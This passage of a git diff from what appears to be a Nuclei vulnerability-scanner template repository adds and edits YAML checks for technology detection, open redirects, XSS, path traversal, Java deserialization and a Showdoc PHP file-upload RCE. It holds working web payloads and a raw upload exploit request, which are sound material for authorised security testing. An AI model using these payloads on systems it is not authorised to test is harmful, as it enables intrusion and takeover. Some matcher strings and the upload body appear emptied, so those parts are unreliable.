win7or2008R2 + words: + - "030000130ed000001234000209080002000000" + - type: word + encoding: hex + name: win2008R2DC + words: + - "030000130ed000001234000201080002000000" + - type: word + encoding: hex + name: win10 + words: + - "030000130ed00000123400021f080002000000" + - type: word + encoding: hex + name: win2012R2OR8 + words: + - "030000130ed00000123400020f080002000000" + - type: word + encoding: hex + name: win2016 + words: + - "030000130ed00000123400021f080008000000" diff --git a/technologies/detect-springboot-actuator.yaml b/technologies/detect-springboot-actuator.yaml deleted file mode 100644 index 25f0aec8ba..0000000000 --- a/technologies/detect-springboot-actuator.yaml +++ /dev/null @@ -1,20 +0,0 @@ -id: detect-springboot-actuator - -info: - name: Detect Springboot Actuators - author: that_juan_ & dwisiswant0 & wdahlenb - severity: info - -requests: - - method: GET - path: - - "{{BaseURL}}/actuator" - matchers-condition: and - matchers: - - type: word - part: body - words: - - '{"_links":{"self"' - - type: status - status: - - 200 diff --git a/technologies/springboot-actuator.yaml b/technologies/springboot-actuator.yaml new file mode 100644 index 0000000000..f93a1441df --- /dev/null +++ b/technologies/springboot-actuator.yaml @@ -0,0 +1,27 @@ +id: springboot-actuator + +info: + name: Detect Springboot Actuators + author: that_juan_ & dwisiswant0 & wdahlenb + severity: info + +requests: + - method: GET + path: + - "{{BaseURL}}/actuator" + - "{{BaseURL}}/favicon.ico" + + matchers-condition: or + matchers: + - type: word + part: body + words: + - '"_links":' + - '"self":' + - '"health"' + condition: and + + - type: dsl + name: "favicon" + dsl: + - "status_code==200 && (\"116323821\" == mmh3(base64_py(body)))" \ No newline at end of file diff --git a/technologies/wazuh-detect.yaml b/technologies/wazuh-detect.yaml new file mode 100644 index 0000000000..061429b6fd --- /dev/null +++ b/technologies/wazuh-detect.yaml @@ -0,0 +1,25 @@ +id: wazuh-detect + +info: + name: wazuh detect + author: cyllective + severity: info + description: Detects wazuh + tags: tech,wazuh + references: + - https://github.com/wazuh/wazuh + +requests: + - method: GET + path: + - "{{BaseURL}}/app/login" + + matchers: + - type: word + part: body + condition: or + words: + - '"id":"wazuh"' + - '"title":"Wazuh"' + - '"icon":"plugins/wazuh/img/icon_blue.png"' + - '"url":"/app/wazuh"' diff --git a/vulnerabilities/generic/open-redirect.yaml b/vulnerabilities/generic/open-redirect.yaml index 7dbb252efe..42b559c2d9 100644 --- a/vulnerabilities/generic/open-redirect.yaml +++ b/vulnerabilities/generic/open-redirect.yaml @@ -21,10 +21,7 @@ requests: - '{{BaseURL}}/example%E3%80%82com' - '{{BaseURL}}/%5Cexample.com' - '{{BaseURL}}/example.com' - - '{{BaseURL}}\example.com' - '{{BaseURL}}//example.com/' - - '{{BaseURL}}\/\/example.com/' - - '{{BaseURL}}%00\/\/example.com/' - '{{BaseURL}}/%00/example.com/' - '{{BaseURL}}/%09/example.com/' - '{{BaseURL}}/%0a/example.com/' @@ -33,14 +30,9 @@ requests: - '{{BaseURL}}/%5cexample.com/%2f%2e%2e' - '{{BaseURL}}@example.com' - '{{BaseURL}}/{{BaseURL}}example.com' - - '{{BaseURL}}\{{BaseURL}}example.com' - '{{BaseURL}}//{{BaseURL}}example.com/' - - '{{BaseURL}}\/\/{{BaseURL}}example.com/' - - '{{BaseURL}}%00\/\/{{BaseURL}}example.com/' - '{{BaseURL}}////{{BaseURL}}example.com/%2f%2e%2e' - '{{BaseURL}}/%5c{{BaseURL}}example.com/%2f%2e%2e' - - '{{BaseURL}}/〱{{BaseURL}}example.com/%2f%2e%2e' - - '{{BaseURL}}@{{BaseURL}}example.com' - '{{BaseURL}}/?page=example.com&_url=example.com&callback=example.com&checkout_url=example.com&content=example.com&continue=example.com&continueTo=example.com&counturl=example.com&data=example.com&dest=example.com&dest_url=example.com&diexample.com&document=example.com&domain=example.com&done=example.com&download=example.com&feed=example.com&file=example.com&host=example.com&html=example.com&http=example.com&https=example.com&image=example.com&image_src=example.com&image_url=example.com&imageurl=example.com&include=example.com&langTo=example.com&media=example.com&navigation=example.com&next=example.com&open=example.com&out=example.com&page=example.com&page_url=example.com&pageurl=example.com&path=example.com&picture=example.com&port=example.com&proxy=example.com&redir=example.com&redirect=example.com&redirectUri=example.com&redirectUrl=example.com&reference=example.com&referrer=example.com&req=example.com&request=example.com&retUrl=example.com&return=example.com&returnTo=example.com&return_path=example.com&return_to=example.com&rurl=example.com&show=example.com&site=example.com&source=example.com&src=example.com&target=example.com&to=example.com&uri=example.com&url=example.com&val=example.com&validate=example.com&view=example.com&window=example.com&redirect_to=example.com&ret=example.com&r2=example.com&img=example.com&u=example.com&r=example.com&URL=example.com&AuthState=example.com' matchers: - type: regex diff --git a/vulnerabilities/generic/top-xss-params.yaml b/vulnerabilities/generic/top-xss-params.yaml index 393f187037..a420339614 100644 --- a/vulnerabilities/generic/top-xss-params.yaml +++ b/vulnerabilities/generic/top-xss-params.yaml @@ -19,21 +19,21 @@ requests: matchers: - type: word words: - - "\"" - - "\"" - - "\"" - - "\"" - - "\"" - - "\"" - - "\"" - - "\"" - - "\"" - - "\"" - - "\"" - - "\"" - - "\"" - - "\"" - - "\"" + - "'>\"" + - "'>\"" + - "'>\"" + - "'>\"" + - "'>\"" + - "'>\"" + - "'>\"" + - "'>\"" + - "'>\"" + - "'>\"" + - "'>\"" + - "'>\"" + - "'>\"" + - "'>\"" + - "'>\"" part: body condition: or @@ -42,6 +42,14 @@ requests: - "text/html" part: header + - type: word + words: + - "Access Denied" + - "You don't have permission to access" + part: body + condition: and + negative: true + - type: status status: - 200 diff --git a/vulnerabilities/oracle/oracle-ebs-bispgraph-file-access.yaml b/vulnerabilities/oracle/oracle-ebs-bispgraph-file-access.yaml index 2f0a34d560..f2dbcccb45 100644 --- a/vulnerabilities/oracle/oracle-ebs-bispgraph-file-access.yaml +++ b/vulnerabilities/oracle/oracle-ebs-bispgraph-file-access.yaml @@ -5,6 +5,10 @@ info: author: emenalf & tirtha_mandal severity: critical tags: moodle,lfi + reference: | + - https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-4.pdf + - https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite.pdf + - http://www.davidlitchfield.com/AssessingOraclee-BusinessSuite11i.pdf requests: - method: GET diff --git a/vulnerabilities/other/myucms-lfr.yaml b/vulnerabilities/other/myucms-lfr.yaml index 421f0480b0..f7ecb3e8de 100644 --- a/vulnerabilities/other/myucms-lfr.yaml +++ b/vulnerabilities/other/myucms-lfr.yaml @@ -4,6 +4,7 @@ info: author: princechaddha severity: high tags: myucms,lfi + reference: https://blog.csdn.net/yalecaltech/article/details/104908257 requests: - method: GET diff --git a/vulnerabilities/other/nuuo-nvrmini2-rce.yaml b/vulnerabilities/other/nuuo-nvrmini2-rce.yaml index 1757042c9e..8346865b45 100644 --- a/vulnerabilities/other/nuuo-nvrmini2-rce.yaml +++ b/vulnerabilities/other/nuuo-nvrmini2-rce.yaml @@ -1,15 +1,14 @@ id: nuuo-nvrmini2-upgradehandlephp-rce info: - name: NUUO NVRmini2 3.0.8 - Remote Code Execution + name: NUUO NVRmini 2 3.0.8 - Remote Code Execution author: berkdusunur severity: critical tags: rce - - # Reference:- - # https://www.exploit-db.com/exploits/45070 - # https://github.com/berkdsnr/NUUO-NVRMINI-RCE - # https://packetstormsecurity.com/files/151573/NUUO-NVRmini-upgrade_handle.php-Remote-Command-Execution.html + reference: | + - https://www.exploit-db.com/exploits/45070 + - https://github.com/berkdsnr/NUUO-NVRMINI-RCE + - https://packetstormsecurity.com/files/151573/NUUO-NVRmini-upgrade_handle.php-Remote-Command-Execution.html requests: - method: GET @@ -18,8 +17,8 @@ requests: matchers-condition: and matchers: - - type: regex - regex: + - type: word + words: - "/upload_tmp_dir/" part: body diff --git a/vulnerabilities/other/oa-v9-uploads-file.yaml b/vulnerabilities/other/oa-v9-uploads-file.yaml index 6e1d292f89..b008ebe22d 100644 --- a/vulnerabilities/other/oa-v9-uploads-file.yaml +++ b/vulnerabilities/other/oa-v9-uploads-file.yaml @@ -1,9 +1,10 @@ id: oa-v9-uploads-file info: - name: OA V9 Uploads File + name: OA V9 RCE via File Upload author: pikpikcu severity: high + description: A vulnerability in OA V9 uploadOperation.jsp endpoint allows remote attackers to upload arbitrary files to the server. These files can be subsequently called and are executed by the remote software. reference: https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g tags: rce,jsp diff --git a/vulnerabilities/other/powercreator-cms-rce.yaml b/vulnerabilities/other/powercreator-cms-rce.yaml index c898de0884..427bf5239a 100644 --- a/vulnerabilities/other/powercreator-cms-rce.yaml +++ b/vulnerabilities/other/powercreator-cms-rce.yaml @@ -4,7 +4,7 @@ info: name: PowerCreator CMS RCE author: pikpikcu severity: critical - reference: http://www.mstir.cn/index.php/2020/11/18/powercreatorcms-rce/ + reference: https://wiki.96.mk/Web%E5%AE%89%E5%85%A8/PowerCreatorCms/PowerCreatorCms%E4%BB%BB%E6%84%8F%E4%B8%8A%E4%BC%A0/ tags: rce,powercreator requests: diff --git a/vulnerabilities/other/rce-via-java-deserialization.yaml b/vulnerabilities/other/rce-via-java-deserialization.yaml deleted file mode 100644 index 558d7d240b..0000000000 --- a/vulnerabilities/other/rce-via-java-deserialization.yaml +++ /dev/null @@ -1,23 +0,0 @@ -id: rce-via-java-deserialization -info: - name: Java Deserialization [RCE] - author: uhnysh - severity: critical - tags: java,rce - reference: https://www.synopsys.com/blogs/software-security/mitigate-java-deserialization-vulnerability-jboss/ - - # This can only be used to detect the vuln, please make sure to run ysoserial over the URLs to verify. - -requests: - - method: GET - path: - - "{{BaseURL}}/josso/%5C../invoker/EJBInvokerServlet/" - - "{{BaseURL}}/josso/%5C../invoker/JMXInvokerServlet/" - - "{{BaseURL}}/invoker/JMXInvokerServlet/" - - "{{BaseURL}}/invoker/EJBInvokerServlet/" - matchers: - - type: word - words: - - "org.jboss.invocation.MarshalledValue" - - "java.lang" - condition: and diff --git a/vulnerabilities/other/resin-cnnvd-200705-315.yaml b/vulnerabilities/other/resin-cnnvd-200705-315.yaml new file mode 100644 index 0000000000..e35605cb4b --- /dev/null +++ b/vulnerabilities/other/resin-cnnvd-200705-315.yaml @@ -0,0 +1,25 @@ +id: resin-cnnvd-200705-315 +info: + name: Caucho Resin Information Disclosure + author: princechaddha + severity: high + reference: | + - http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200705-315 + tags: resin,caucho,lfr + +requests: + - method: GET + path: + - "{{BaseURL}}/%20../web-inf/" + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "/ ../web-inf/" + - "Directory of /" + condition: and + part: body diff --git a/vulnerabilities/other/showdoc-file-upload-rce.yaml b/vulnerabilities/other/showdoc-file-upload-rce.yaml new file mode 100644 index 0000000000..a83e353f93 --- /dev/null +++ b/vulnerabilities/other/showdoc-file-upload-rce.yaml @@ -0,0 +1,47 @@ +id: showdoc-file-upload-rce +info: + name: Showdoc < 2.8.6 File Upload RCE + author: pikpikcu + severity: critical + reference: https://github.com/star7th/showdoc/pull/1059 + tags: rce,fileupload,showdoc + +requests: + - raw: + - | + POST /index.php?s=/home/page/uploadImg HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0 + Content-Length: 239 + Content-Type: multipart/form-data; boundary=--------------------------835846770881083140190633 + Accept-Encoding: gzip + + ----------------------------835846770881083140190633 + Content-Disposition: form-data; name="editormd-image-file"; filename="test.<>php" + Content-Type: text/plain + + + ----------------------------835846770881083140190633-- + + - | + GET /Public/Uploads{{url_decode("§path§")}} HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + + extractors: + - type: regex + name: path + group: 1 + internal: true + part: body + regex: + - '/Uploads\\(.*?)"\,"success"' + + req-condition: true + matchers: + - type: dsl + dsl: + - 'contains(body_2, "PHP Extension")' + - 'contains(body_2, "PHP Version")' + - 'status_code_2 == 200' + condition: and diff --git a/vulnerabilities/springboot/springboot-actuators-jolokia-xxe.yaml b/vulnerabilities/springboot/springboot-actuators-jolokia-xxe.yaml index 3122baac6e..d6b61f02fa 100644 --- a/vulnerabilities/springboot/springboot-actuators-jolokia-xxe.yaml +++ b/vulnerabilities/springboot/springboot-actuators-jolokia-xxe.yaml @@ -4,7 +4,10 @@ info: name: Spring Boot Actuators (Jolokia) XXE author: dwisiswant0 severity: high - description: todo + description: A vulnerability in Spring Boot Actuators's 'jolokia' endpoint allows remote attackers to preform an XML External Entities attack, include content stored on a remote server as if it was its own - this has the potential to allow the execution of arbitrary code and/or disclosure of sensitive information from the target machine. + reference: | + - https://www.veracode.com/blog/research/exploiting-spring-boot-actuators + - https://github.com/mpgn/Spring-Boot-Actuator-Exploit tags: springboot,jolokia,xxe requests: diff --git a/vulnerabilities/wordpress/wordpress-wordfence-xss.yaml b/vulnerabilities/wordpress/wordpress-wordfence-xss.yaml index 35edb25e89..4a9a1ee7e9 100644 --- a/vulnerabilities/wordpress/wordpress-wordfence-xss.yaml +++ b/vulnerabilities/wordpress/wordpress-wordfence-xss.yaml @@ -9,14 +9,19 @@ info: requests: - method: GET path: - - "{{BaseURL}}/wp-content/plugins/wordfence/lib/diffResult.php?file=%22%3E%3Csvg%2Fonload%3Dalert(1337)%3E" + - "{{BaseURL}}/wp-content/plugins/wordfence/lib/diffResult.php?file=%27%3E%22%3Csvg%2Fonload=confirm%28%27test%27%29%3E" + matchers-condition: and matchers: - type: word words: - - "" + - "'>\"" part: body - type: word words: - "text/html" - part: header \ No newline at end of file + part: header + + - type: status + status: + - 200 \ No newline at end of file diff --git a/workflows/cisco-asa-workflow.yaml b/workflows/cisco-asa-workflow.yaml index 1cfe3751a3..455eb68e1c 100644 --- a/workflows/cisco-asa-workflow.yaml +++ b/workflows/cisco-asa-workflow.yaml @@ -16,5 +16,4 @@ workflows: subtemplates: - template: cves/2020/CVE-2020-3187.yaml - template: cves/2020/CVE-2020-3452.yaml - - template: cves/2018/CVE-2018-0296.yaml - - template: cves/2018/CVE-2018-0101.yaml \ No newline at end of file + - template: cves/2018/CVE-2018-0296.yaml \ No newline at end of file diff --git a/workflows/ruijie-workflow.yaml b/workflows/ruijie-workflow.yaml index 4cf6d3b166..5ba69854c5 100644 --- a/workflows/ruijie-workflow.yaml +++ b/workflows/ruijie-workflow.yaml @@ -11,3 +11,4 @@ workflows: - template: vulnerabilities/other/ruijie-networks-rce.yaml - template: exposures/configs/ruijie-information-disclosure.yaml - template: exposures/configs/ruijie-smartweb-disclosure.yaml + - template: exposures/configs/ruijie-phpinfo.yaml diff --git a/workflows/springboot-workflow.yaml b/workflows/springboot-workflow.yaml index 3f3d692b03..290205834d 100644 --- a/workflows/springboot-workflow.yaml +++ b/workflows/springboot-workflow.yaml @@ -11,11 +11,12 @@ info: workflows: - - template: technologies/detect-springboot-actuator.yaml + - template: technologies/springboot-actuator.yaml subtemplates: - template: misconfiguration/springboot/springboot-configprops.yaml - template: misconfiguration/springboot/springboot-env.yaml - template: misconfiguration/springboot/springboot-heapdump.yaml + - template: misconfiguration/springboot/springboot-httptrace.yaml - template: misconfiguration/springboot/springboot-loggers.yaml - template: misconfiguration/springboot/springboot-mappings.yaml - template: misconfiguration/springboot/springboot-trace.yaml